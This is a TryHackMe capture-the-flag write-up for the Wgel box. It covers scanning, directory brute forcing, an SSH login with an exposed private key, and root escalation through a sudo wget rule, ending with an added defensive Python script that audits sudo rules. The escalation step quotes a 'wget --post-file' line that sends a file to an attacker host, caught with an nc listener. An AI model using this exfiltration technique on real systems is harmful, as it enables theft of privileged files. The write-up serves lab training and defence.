TryHackMe — Wgel CTF

Constantin Dorin
Apr 7, 2022

Have fun with this easy box.

Link to the room: TryHackMe | Wgel CTF

Let’s start with a rustscan enumeration.

Run rustscan -a 10.10.10.247 --ulimit 5000 -- -A -vvv -sV -sC -Pn

Looking at the above results, we have 2 ports open: 22 and 80.

Let’s view the page source on port 80.

It looks like we have found a username: jessie.

The next step will be to brute force directories.

Run gobuster dir -u 10.10.158.73 -w /usr/share/dirb/wordlists/common.txt

Let’s check the directories discovered above.

As we can see, we didn’t manage to discover any important information.

So, to dig deeper, I like to use the following:

gobuster dir -u http://10.10.158.73/sitemap -w /usr/share/dirb/wordlists/common.txt

We have found a few subdirectories. Let’s check them.

After checking all the /sitemap/ subdirectories, I finally discovered something “juicy”: an id_rsa key.

Create a new file named ssh. Copy the id_rsa key and paste it into the ssh file. Then change the permissions of the ssh file.

Use chmod 600 ssh.

We will attempt to log in using the id_rsa key (ssh) and the username we found, “jessie”.

Run ssh -i ssh jessie@10.10.158.73

We successfully logged in! Let’s check for the user_flag.txt.

There we go, user flag!

The next step for us will be privilege escalation.

Run sudo -l to discover what commands we can run.

Looking at the above result, we can run /usr/bin/wget with sudo.

Navigate to GTFOBins. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

URL=http://attackerip/
LFILE=file_to_send
wget --post-file=$LFILE $URL

Open a new terminal and start a listener with nc -nvlp 34567 (34567 is the port number).

Oh yeah, we’ve got the root_flag.txt.
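
From the defender's side, the sudo rule this box relies on can be caught by auditing `sudo -l` output for file-capable binaries. The following is an added example, not part of the original write-up; the sample output is constructed, and FILE_CAPABLE, parse_rules and audit are hypothetical names chosen here.

```python
import re

# Illustrative subset of binaries that can read or write arbitrary files
# when run as another user (assumption for this example; GTFOBins lists more).
FILE_CAPABLE = {"wget", "curl", "tar", "cp", "find", "vim", "less", "tee", "dd"}

# Constructed sample of `sudo -l` output; the write-up does not reproduce the real one.
SAMPLE_SUDO_L = """\
User jessie may run the following commands on host:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
"""

# An indented rule line: "(runas) [TAG: ...] command[, command ...]"
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_rules(text):
    """Return (runas, tags, command) tuples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines and Defaults entries do not start with "("
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            rules.append((m.group("runas").strip(), tags, cmd))
    return rules

def audit(text):
    """Flag rules that allow reading or writing files as another user."""
    findings = []
    for runas, tags, cmd in parse_rules(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL":
            reason = "unrestricted sudo"
        elif binary in FILE_CAPABLE:
            reason = f"{binary} can read or write arbitrary files as {runas}"
        else:
            continue
        # NOPASSWD is the worse case: a session obtained with a stolen SSH key
        # has no account password, yet the rule still applies.
        severity = "high" if "NOPASSWD" in tags else "medium"
        findings.append({"command": cmd, "runas": runas,
                         "severity": severity, "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print(f"[{finding['severity']}] {finding['command']}: {finding['reason']}")
```

A high-severity hit like the wget rule means the sudoers entry should be removed; the other root cause on this box, a private key readable under the web root, needs its own fix.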

Thank you for reading, I hope you enjoyed it.

You can find me on: TryHackMe | cody1
